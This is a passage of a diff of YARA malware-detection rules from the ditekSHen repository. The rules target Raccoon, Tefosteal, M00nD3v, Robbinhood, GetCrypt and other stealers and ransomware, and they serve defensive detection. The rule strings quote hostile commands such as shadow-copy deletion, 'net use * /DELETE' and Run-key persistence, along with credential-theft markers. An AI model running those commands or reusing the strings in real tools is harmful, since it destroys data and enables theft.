"InjectDrv.sys" fullword ascii - $s6 = "SharpX.dll" fullword wide - $s7 = "GetMicrosoftEdgeProcessId" ascii - $s8 = ".php?type=is&ch=" ascii - $s9 = ".php?uid=" ascii - $s10 = "&mc=" fullword ascii - $s11 = "&os=" fullword ascii - $s12 = "&x=32" fullword ascii + $s1 = "/c /Ox /Fa\"%s/%s.asm\" /Fo\"%s/%s.obj\" \"%s/%s.%s\"" ascii + $s2 = "this->piProcInfo.hProcess" fullword ascii + $s3 = "index >= 0 && index < this->reg_tab->GetLen()" fullword ascii + $s4 = "strcpy(log_font.lfFaceName,\"%s\");" fullword ascii + $s5 = "WorkShop -- [%s]" fullword ascii + $s6 = "HeaderFile.cpp" fullword ascii + $s7 = "WndLog.cpp" fullword ascii + $s8 = "assertion fail \"%s\" at file=%s line=%d" fullword ascii + $s9 = "Stdin pipe creation failed" fullword ascii condition: - uint16(0)==0x5a4d and 8 of ($s*) + ( uint16(0)==0x5a4d and 6 of ($s*)) or ( all of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_Itranslatordll : FILE +rule DITEKSHEN_MALWARE_Win_Raccoon : FILE { meta: - description = "Detects iTranslator DLL payload" + description = "Raccoon stealer payload" author = "ditekSHen" - id = "df05da78-3626-5eb5-81a2-a93fba844484" - date = "2024-09-06" - modified = "2024-09-06" + id = "5ebef663-623c-592e-b69a-f620492f0cc1" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2876-L2892" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "ca0479efd241058f358553b6382a1987a5b4c069965f4adb88cd2f3fc4bef21a" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L587-L606" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "258481982d20d229506f442a5a205fdc05f6ac4399f3a0665860e6529c30943b" score = 75 - quality = 75 + quality = 50 tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.iTranslator_DLL" strings: - $d1 = "system32\\drivers\\%S.sys" fullword wide - $d2 = "\\windows\\system32\\winlogon.exe" fullword ascii - $d3 = "\\Registry\\Machine\\SYSTEM\\ControlSet001\\services\\%s" fullword wide - $d4 = "\\Registry\\Machine\\SYSTEM\\ControlSet001\\services\\webssx" fullword wide - $d5 = "\\Device\\CtrlSM" fullword wide - $d6 = "\\DosDevices\\CtrlSM" fullword wide - $d7 = "\\driver_wfp\\CbFlt\\Bin\\CbFlt.pdb" ascii - $d8 = ".php" ascii + $s1 = "inetcomm server passwords" fullword wide + $s2 = "content-disposition: form-data; name=\"file\"; filename=\"data.zip\"" fullword ascii + $s3 = ".?AVfilesystem_error@v1@filesystem@experimental@std@@" fullword ascii + $s4 = "CredEnumerateW" fullword ascii + $s5 = "%[^:]://%[^/]%[^" fullword ascii + $s6 = "%99[^:]://%99[^/]%99[^" fullword ascii + $s7 = "Login Data" wide + $s8 = "m_it.object_iterator != m_object->m_value.object->end()" fullword wide + $x1 = "endptr == token_buffer.data() + token_buffer.size()" fullword wide + $x2 = "\\json.hpp" wide + $x3 = "Microsoft_WinInet_" fullword wide + $x4 = "Microsoft_WinInet_*" fullword wide condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x5a4d and ((3 of ($x*) and 2 of ($s*)) or (4 of ($s*) and 1 of ($x*))) } import "pe" -rule DITEKSHEN_MALWWARE_Win_Octopus : FILE +rule DITEKSHEN_MALWARE_Win_Tefosteal : FILE { meta: - description = "Detects Octopus trojan payload" + description = "Tefosteal payload" author = "ditekSHen" - id = "eb092e23-864f-52f3-bfa4-7e3c616d3984" - date = "2024-09-06" - modified = "2024-09-06" + id = "56646933-3ed3-5b77-9135-993b57603490" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2894-L2917" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "012b75c94be3021dbcc5b8e8bd62f807c9aa8bc0df94f830a5294aaf0d21b9fc" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L653-L674" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "a350863270cbe3349f271e55d66a2ebdd6406e8d122c11071de74a774eb77ebf" score = 75 - quality = 23 + quality = 71 tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.Octopus" + clamav_sig = "MALWARE.Win.Trojan.Tefosteal" strings: - $s1 = "\\Mozilla\\Firefox\\Profiles\\" fullword wide - $s2 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword wide - $s3 = "\\wbem\\WMIC.exe" fullword wide - $s4 = ".profiles.ini" fullword wide - $s5 = "PushEBP_" ascii - $s6 = "MovEBP_ESP_" ascii - $s7 = "Embarcadero Delphi for Win32 compiler" ascii - $s8 = "TempWmicBatchFile.bat" fullword wide - $wq1 = "computersystem get Name /format:list" wide - $wq2 = "os get installdate /format:list" wide - $wq3 = "get serialnumber /format:list" wide - $wq4 = "\\\\\\\\.\\\\PHYSICALDRIVE" wide - $wq5 = "path CIM_LogicalDiskBasedOnPartition" wide - $wq6 = "get Antecedent,Dependent" wide - $wq7 = "path win32_physicalmedia" wide + $s1 = "netsh wlan show networks mode=bssid" nocase fullword wide + $s2 = "LoginCredentialService.GetLoginCredentials$" ascii + $s3 = "DefaultLoginCredentials.LoginEventUsrPw$" ascii + $s4 = "SEC_E_NO_KERB_KEY" wide + $s5 = "TList<System.Zip.TZipHeader>." ascii + $s6 = "_Password.txt" fullword wide nocase + $s7 = "_Cookies.txt" fullword wide nocase + $f1 = "\\InfoPC\\BSSID.txt" wide + $f2 = "\\Files\\Telegram\\" wide + $f3 = "\\InfoPC\\Screenshot.png" wide + $f4 = "\\InfoPC\\Systeminfo.txt" wide + $f5 = "\\Steam\\config" wide + $f6 = "\\delete.vbs" wide condition: - uint16(0)==0x5a4d and (6 of ($s*) and 5 of ($wq*)) + uint16(0)==0x5a4d and 4 of ($s*) and 2 of ($f*) } import "pe" -rule DITEKSHEN_MALWARE_Win_Caspertroy : FILE +rule DITEKSHEN_MALWARE_Win_Cryptostealergo : FILE { meta: - description = "Detects CasperTroy payload" + description = "CryptoStealerGo payload" author = "ditekSHen" - id = "822c3231-60ba-5e60-8df8-06dea80b318a" - date = "2024-09-06" - modified = "2024-09-06" + id = "83886aeb-af7e-564c-989a-fb7d955814e2" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2919-L2931" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "ce070b1e6279ef9fa47f84da7c5166cd93b3e7a0f95541ae14c048b2af9bc431" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L676-L692" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "0050be7522e7d89cb9688e63fdca11d24baa74aa858e8c19ee7b4658518536b6" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "DllTroy.dll" fullword ascii - $s2 = "Content-Disposition: form-data; name=\"image\"; filename=\"title.gif\"" fullword ascii - $s3 = "Content-Disposition: form-data; name=\"COOKIE_ID\"" fullword ascii - $s4 = "Content-Disposition: form-data; name=\"PHP_SESS_ID\"" fullword ascii - $s5 = "Content-Disposition: form-data; name=\"SESS_ID\"" fullword ascii + $s1 = "Go build ID: \"" ascii + $s2 = "file_upload.go" ascii + $s3 = "grequests.FileUpload" ascii + $s4 = "runtime.newproc" ascii + $s5 = "credit_cards" ascii + $s6 = "zip.(*fileWriter).Write" ascii + $s7 = "autofill_" ascii + $s8 = "XFxVc2VyIERhdGFcXA==" ascii + $s9 = "XFxBcHBEYXRhXFxMb2NhbFxc" ascii condition: - uint16(0)==0x5a4d and 4 of them + uint16(0)==0x5a4d and 8 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Rasftuby : FILE +rule DITEKSHEN_MALWARE_Win_M00Nd3V : FILE { meta: - description = "Detects Rasftuby/DarkCrystal" + description = "M00nD3v keylogger payload" author = "ditekSHen" - id = "908624a8-0068-5512-a5d0-77ce1f4efd80" - date = "2024-09-06" - modified = "2024-09-06" + id = "4000f55d-e072-50b6-b6ee-72cefc0ec53f" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2933-L2950" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "b769c1986d23173cf8a8a3c8a14d388a7c0327e46d936fc97c449dc55f2a5575" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L694-L715" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "68a0888da3b114dc895fe18a3d03b2b88d140fbf82b888f7a031b9364d01aabf" score = 75 quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.DarkCrystal.RAT-Rasftuby" strings: - $s1 = "/DCRS/main.php?data=active" fullword ascii wide - $s2 = "/socket.php?type=__ds_" ascii wide - $s3 = "/uploader.php" fullword ascii wide - $s4 = "del \\\"%USERPROFILE%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\System.lnk\\\"" fullword ascii wide - $s5 = "Host:{0},Port:{1},User:{2},Pass:{3}<STR>" fullword ascii wide - $s6 = "keyloggerstart_status" fullword ascii wide - $s7 = "keyloggerstop_status" fullword ascii wide - $s8 = "[PRINT SCREEN]" fullword ascii wide - $s9 = "DCS.Internal" ascii + $s1 = "M00nD3v Stub" ascii wide + $s2 = "M00nD3v{0}{1} Logs{0}{2} \\ {3}{0}{0}{4}" fullword wide + $s3 = "Anti-Keylogger Elite" wide + $s4 = "/C TASKKILL /F /IM" wide + $s5 = "echo.>{0}:Zone.Identifier" fullword wide + $s6 = "> Nul & Del \"{0}\" & start \"\" \"{1}.exe\"" wide + $s7 = "> Nul & start \"\" \"{1}.exe\"" wide + $s8 = "Stealer" fullword wide + $s9 = "{0}{0}++++++++++++{1} {2}++++++++++++{0}{0}" wide + $s10 = "{4}Application: {3}{4}URL: {0}{4}Username: {1}{4}Password: {2}{4}" wide + $s11 = "encrypted_key\":\"(?<Key>.+?)\"" wide + $s12 = "Botkiller" fullword ascii + $s13 = "AVKiller" fullword ascii + $s14 = "get_pnlPawns" fullword ascii condition: - uint16(0)==0x5a4d and 5 of ($s*) + ( uint16(0)==0x5a4d and 6 of them ) or (9 of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_Protonbot : FILE +rule DITEKSHEN_MALWARE_Win_Vssdestroy : FILE { meta: - description = "Detects ProtonBot loader" + description = "VSSDestroy/Matrix ransomware payload" author = "ditekSHen" - id = "b0d08378-0297-5e70-99f1-1dc0fec6fa01" - date = "2024-09-06" - modified = "2024-09-06" + id = "734ece56-b993-5b44-ae15-f673fabfe8ad" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2952-L2969" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "b511dfd47109d36ffc7fcb23b49779e1164d50a28061ab724d7a2c744ac23ac8" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L717-L740" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "24bfd32580f784440252d629a7ab86b84a570ded34409940616be2a89bf73088" score = 75 quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.ProtonBot" + snort_sid = "920008-920009" + clamav_sig = "MALWARE.Win.Ransomware.VSSDestroy" strings: - $x1 = "\\PROTON\\Release\\build.pdb" ascii - $x2 = "\\proton\\proton bot\\json.hpp" wide - $x3 = "proton bot" ascii wide - $s1 = "endptr == token_buffer.data() + token_buffer.size()" fullword wide - $s2 = "ranges.size() == 2 or ranges.size() == 4 or ranges.size() == 6" fullword wide - $s3 = "ref_stack.back()->is_array() or ref_stack.back()->is_object()" fullword wide - $s4 = "ktmw32.dll" fullword ascii - $s5 = "@detail@nlohmann@@" ascii - $s6 = "urlmon.dll" fullword ascii + $o1 = "[SHARESSCAN]" wide + $o2 = "[LDRIVESSCAN]" wide + $o3 = "[LOGSAVED]" wide + $o4 = "[LPROGRESS]" wide + $o5 = "[FINISHSAVED]" wide + $o6 = "[ALL_LOCAL_KID]" wide + $o7 = "[DIRSCAN" wide + $o8 = "[GENKEY]" wide + $s1 = "\\cmd.exe" nocase wide + $s2 = "/C powershell \"" nocase wide + $s3 = "%COMPUTERNAME%" wide + $s4 = "%USERNAME%" wide + $s5 = "Error loading Socket interface (ws2_32.dll)!" wide + $s6 = "Old file list dump found. Want to load it? (y/n):" fullword wide condition: - uint16(0)==0x5a4d and (2 of ($x*) or ( all of ($s*) and 1 of ($x*))) + ( uint16(0)==0x5a4d and 4 of ($o*) and 3 of ($s*)) or (5 of ($o*) and 4 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Imminentrat : FILE +rule DITEKSHEN_MALWARE_Win_Goldenaxe : FILE { meta: - description = "Detects ImminentRAT" + description = "GoldenAxe ransomware payload" author = "ditekSHen" - id = "99831b32-d8a0-5814-bf41-491f607ee825" - date = "2024-09-06" - modified = "2024-09-06" + id = "23874106-dbbb-5cb2-b61a-1661d8e2d868" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2971-L2994" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "f959fd28e818b17c962fcd5bb99fa5ac0058f22494950e0200f139703f3e756a" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L742-L763" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "6dfd88ce65acdfed4749e3b817b317c3c514ea42f892a7f5f95853c148507918" score = 75 quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Ransomware.GoldenAxe" strings: - $x1 = "abuse@imminentmethods.net" ascii - $x2 = "Imminent-Monitor-" ascii - $x3 = "AddressChangeListener" fullword ascii - $x4 = "SevenZipHelper" fullword ascii - $x5 = "WrapNonExceptionThrows" fullword ascii - $s1 = "_ENABLE_PROFILING" wide - $s2 = "Anti-Virus: {0}" wide - $s3 = "File downloaded & executed" wide - $s4 = "Chat - You are speaking with" wide - $s5 = "\\Imminent\\Plugins" wide - $s6 = "\\Imminent\\Path.dat" wide - $s7 = "\\Imminent\\Geo.dat" wide - $s8 = "DisableTaskManager = {0}" wide - $s9 = "This client is already mining" wide - $s10 = "Couldn't get AV!" wide - $s11 = "Couldn't get FW!" wide + $s1 = "Go build ID: " ascii + $s2 = "taskkill.exe" ascii + $s3 = "cmd.exe" ascii + $s4 = "Speak.Speak" ascii + $s5 = "CLNTSRVRnull" ascii + $s6 = "-----END" ascii + $s7 = "-----BEGIN" ascii + $s8 = ".EncryptFile" ascii + $g1 = "GoldenAxe/Utils." ascii + $g2 = "GoldenAxe/Cryptography." ascii + $g3 = "GoldenAxe/Walker." ascii + $g4 = "C:/Users/alpha/go/src/GoldenAxe/" ascii + $g5 = "'Golden Axe ransomware'" ascii condition: - uint16(0)==0x5a4d and (4 of ($x*) or 5 of ($s*)) + uint16(0)==0x5a4d and ( all of ($s*) or (1 of ($g*) and 1 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Warzonerat : FILE +rule DITEKSHEN_MALWARE_Win_Robbinhood : FILE { meta: - description = "Detects AveMaria/WarzoneRAT" + description = "Robbinhood ransomware payload" author = "ditekSHen" - id = "4f3df696-280c-5f2b-9511-8cc7c9dff1d6" - date = "2024-09-06" - modified = "2024-09-06" + id = "a5066a22-3c87-5e9f-a94f-5a44af2f96fd" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2996-L3011" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "1af8b0f90b0de3287499082a6d6d9da6ed62a3110018e0c0f7149353693060b2" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L765-L787" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "f1c4226ed5cb1583418d5ef0efc2c2b5bc3cfe7f148f359c5d432fd660331a46" score = 75 quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Ransomware.Robbinhood" strings: - $s1 = "RDPClip" fullword wide - $s2 = "Grabber" fullword wide - $s3 = "Ave_Maria Stealer OpenSource" wide - $s4 = "\\MidgetPorn\\workspace\\MsgBox.exe" wide - $s5 = "@\\cmd.exe" wide - $s6 = "/n:%temp%\\ellocnak.xml" wide - $s7 = "Hey I'm Admin" wide - $s8 = "warzone160" fullword ascii + $go = "Go build ID:" ascii + $cmd1 = "cmd.exe /c" ascii + $cmd2 = "net use * /DELETE" nocase ascii + $cmd3 = "sc.exe stop" ascii + $cmd4 = "vssadmin resize shadowstorage" nocase ascii + $s1 = /Skipping\s(file|dir)/ ascii + $s2 = "Encrypt[ERR] GET Size:" ascii + $s3 = ".taskkilltasklistunknown(" ascii + $s4 = ".sysvssadmin.exewevtutil.exe MB released" ascii + $s5 = ".sysvssadmin.exewevtutil.exewinlogin.exewinlogon.exe MB released" ascii + $s6 = ".enc_robbinhood" ascii + $s7 = "c:\\windows\\temp\\pub.key" nocase ascii + $s8 = "main.CoolMaker" ascii + $s9 = "/valery/go/src/oldboy/" ascii condition: - uint16(0)==0x5a4d and 5 of ($s*) + uint16(0)==0x5a4d and ($go and 1 of ($cmd*) and 3 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Karaganycore : FILE +rule DITEKSHEN_MALWARE_Win_Getcrypt : FILE { meta: - description = "Detects Karagany/xFrost core plugin" + description = "GetCrypt ransomware payload" author = "ditekSHen" - id = "c066805b-9373-5524-aff9-d16cd59f5a24" - date = "2024-09-06" - modified = "2024-09-06" + id = "fb6db807-372f-59e6-96c6-54dd4ece336d" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3013-L3027" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "cde96ac6477fda1312ce4f7532018c9f11df7d39c40155d10bdde0e3d84c6d57" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L789-L825" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "fd7ee98757c3ac1f2b2a4dd9041c78d33273d7a7d596c3d99c6b8d79988f29f1" score = 75 - quality = 75 + quality = 73 tags = "FILE" + clamav_sig1 = "MALWARE_Win.Ransomware.GetCrypt-1" + clamav_sig2 = "MALWARE_Win.Ransomware.GetCrypt-2" strings: - $s1 = "127.0.0.1" fullword ascii - $s2 = "port" fullword ascii - $s3 = "C:\\Windows\\System32\\Kernel32.dll" fullword ascii - $s4 = "kernel32.dll" fullword ascii - $s5 = "http" ascii - $s6 = "Move" fullword ascii - $s7 = "<supportedOS Id=\"{" ascii + $x1 = "delete shadows /all /quiet" wide + $x2 = "C:\\Windows\\System32\\svchost.exe" fullword wide + $x3 = "desk.bmp" fullword wide + $x4 = ":\\Boot" fullword wide + $x5 = "\\encrypted_key.bin" fullword wide + $x6 = "vssadmin.exe" fullword wide + $x7 = ":\\Recovery" fullword wide + $s1 = "CryptEncrypt" fullword ascii + $s2 = "NtWow64ReadVirtualMemory64" fullword ascii + $s3 = "MPR.dll" fullword ascii + $s4 = "%key%" fullword ascii + $s5 = "CryptDestroyKey" fullword ascii + $s6 = "ntdll.dll" fullword ascii + $s7 = "WNetCancelConnection2W" fullword ascii + $s8 = ".%c%c%c%c" fullword wide + $s10 = { 43 72 79 70 74 49 6d 70 6f 72 74 4b 65 79 00 00 + cb 00 43 72 79 70 74 45 6e 63 72 79 70 74 00 00 + c1 00 43 72 79 70 74 41 63 71 75 69 72 65 43 6f + 6e 74 65 78 74 41 00 00 c8 00 43 72 79 70 74 44 + 65 73 74 72 6f 79 4b 65 79 00 d2 00 43 72 79 70 + 74 47 65 6e 52 61 6e 64 6f 6d 00 00 c2 00 43 72 + 79 70 74 41 63 71 75 69 72 65 43 6f 6e 74 65 78 + 74 57 00 00 41 44 56 41 50 49 33 32 2e 64 6c 6c + 00 00 b5 01 53 68 65 6c 6c 45 78 65 63 75 74 65 + 45 78 57 00 53 48 45 4c 4c 33 32 2e 64 6c 6c 00 } condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x5a4d and (3 of ($x*) or 8 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Karaganykeylogger : FILE +rule DITEKSHEN_MALWARE_Joego : FILE { meta: - description = "Detects Karagany/xFrost keylogger plugin" + description = "JoeGo ransomware payload" author = "ditekSHen" - id = "dd14ede0-7132-5b7f-872a-d96d5275a8e4" - date = "2024-09-06" - modified = "2024-09-06" + id = "23d38bcd-e66d-5ff1-ad6a-3e6432d83562" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3029-L3041" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "7f1f5b2ca67e62380c8a8095fed4a4fd76d7bc15c9fe2d76e780ad85f886ef7b" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L827-L847" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "3ddf3506aefb3cd1845f9daa689848a02a2422ca98c5c984bc918cc7ea2b2677" score = 75 - quality = 23 + quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Ransomware.JoeGo" strings: - $s1 = "__klg__" fullword wide - $s2 = "__klgkillsoft__" fullword wide - $s3 = "CLIPBOARD_PASTE" wide - $s4 = "%s\\k%d.txt" wide - $s5 = "\\Update\\Tmp" wide + $go = "Go build ID:" ascii + $s1 = "%SystemRoot%\\system32\\%v." ascii + $s2 = "REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V" ascii + $s3 = "/t REG_SZ /F /D %userprofile%\\" ascii + $s4 = "(sensitive) [recovered]" ascii + $s5 = "/dev/stderr/dev/stdout/index.html" ascii + $s6 = "%userprofile%\\SystemApps" ascii + $s7 = "p=<br>ACDTACSTAEDTAESTAKDTAKSTAWSTA" ascii + $cnc1 = "/detail.php" ascii + $cnc2 = "/checkin.php" ascii + $cnc3 = "/platebni_brana.php" ascii + $cnc4 = "://nebezpecnyweb.eu/" ascii condition: - uint16(0)==0x5a4d and 4 of them + uint16(0)==0x5a4d and $go and ( all of ($s*) or (3 of ($s*) and 1 of ($cnc*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Karaganyscreenutil : FILE +rule DITEKSHEN_MALWARE_Win_Aurora : FILE { meta: - description = "Detects Karagany/xFrost ScreenUtil module" + description = "Aurora ransomware payload" author = "ditekSHen" - id = "5eab1bb9-a433-54e6-963b-4aca863dc73f" - date = "2024-09-06" - modified = "2024-09-06" + id = "d3eafe9c-c8d9-5744-ba5d-4eb0249cceea" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3043-L3055" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "d10230d94adfdddd604e2569ae3323efa1d5722647b9c704fceefe9446ccebd1" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L849-L869" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "056bb11e8b947ef90462503db82b2001e4a5d4847fad9c0d5d771384a80d779a" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "__pic__" ascii wide - $s2 = "__pickill__" ascii wide - $s3 = "\\picture.png" fullword wide - $s4 = "%d.jpg" wide - $s5 = "\\Update\\Tmp" wide + $s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" fullword ascii wide + $s2 = "#DECRYPT_MY_FILES#.txt" fullword ascii + $s3 = "/gen.php?generate=" fullword ascii + $s4 = "geoplugin.net/php.gp" ascii + $s5 = "/end.php?id=" fullword ascii + $s6 = "wotreplay" fullword ascii + $s7 = "moneywell" fullword ascii + $s8 = "{btc}" fullword ascii + $s9 = ".?AV_Locimp@locale@std@@" ascii + $s10 = ".?AV?$codecvt@DDU_Mbstatet@@@std@@" ascii + $s11 = ".?AU_Crt_new_delete@std@@" ascii + $pdb1 = "\\z0ddak\\Desktop\\source\\Release\\Ransom.pdb" ascii + $pdb2 = "\\Desktop\\source\\Release\\Ransom.pdb" ascii condition: - uint16(0)==0x5a4d and 4 of them + uint16(0)==0x5a4d and ((1 of ($pdb*) and 5 of ($s*)) or (8 of them )) } import "pe" -rule DITEKSHEN_MALWARE_Win_Karaganylistrix : FILE +rule DITEKSHEN_MALWARE_Win_Buran : FILE { meta: - description = "Detects Karagany/xFrost Listrix module" + description = "Buran ransomware payload" author = "ditekSHen" - id = "837cc9e7-eefb-530c-854b-51bb4444ae78" - date = "2024-09-06" - modified = "2024-09-06" + id = "1433bac5-2ece-54bb-8e57-b5834fffc719" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3057-L3069" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "02216061dbe93b7bea108f4b27c052d87c14cfe9395c6c5d4eed46ed7819e7ae" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L871-L903" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "eaf50d824dbade0ca63fafc5b4a376553039de9b51a0f6387cb28c8f91a7e0b9" score = 75 - quality = 75 + quality = 73 tags = "FILE" + clamav_sig = "MALWARE.Win.Ransomware.Buran" strings: - $s1 = "\\Update\\Tmp\\" wide - $s2 = "*pass*.*" fullword wide - $s3 = ">> NUL" wide - $s4 = "%02d.%02d.%04d %02d:%02d" wide - $s5 = "/c del" wide + $v1_1 = "U?$error_info_injector@V" ascii + $v1_2 = "Browse for Folder (FTP)" fullword ascii + $v1_3 = "Find/Replace in Files" fullword ascii + $v1_4 = "PAHKLM" fullword ascii + $v1_5 = "PAHKCR" fullword ascii + $v1_6 = "chkOpt_" ascii + $h1 = "Search <a href=\"location\" class=\"menu\">in this folder</a>" ascii + $h2 = "<br>to find where the text below" ascii + $h3 = "</a> files with these extensions (separate with semi-colons)" ascii + $h4 = "Need help with <a href=\"" ascii + $path = "\\work\\cr\\nata\\libs\\boost_" wide + $v2_1 = "(ShlObj" fullword ascii + $v2_2 = "\\StreamUnit" fullword ascii + $v2_3 = "TReadme" fullword ascii + $v2_4 = "TDrivesAndShares" fullword ascii + $v2_5 = "TCustomMemoryStreamD" fullword ascii + $v2_6 = "OpenProcessToken" fullword ascii + $v2_7 = "UrlMon" fullword ascii + $v2_8 = "HttpSendRequestA" fullword ascii + $v2_9 = "InternetConnectA" fullword ascii + $v2_10 = "FindFiles" fullword ascii + $v2_12 = "$*@@@*$@@@$" 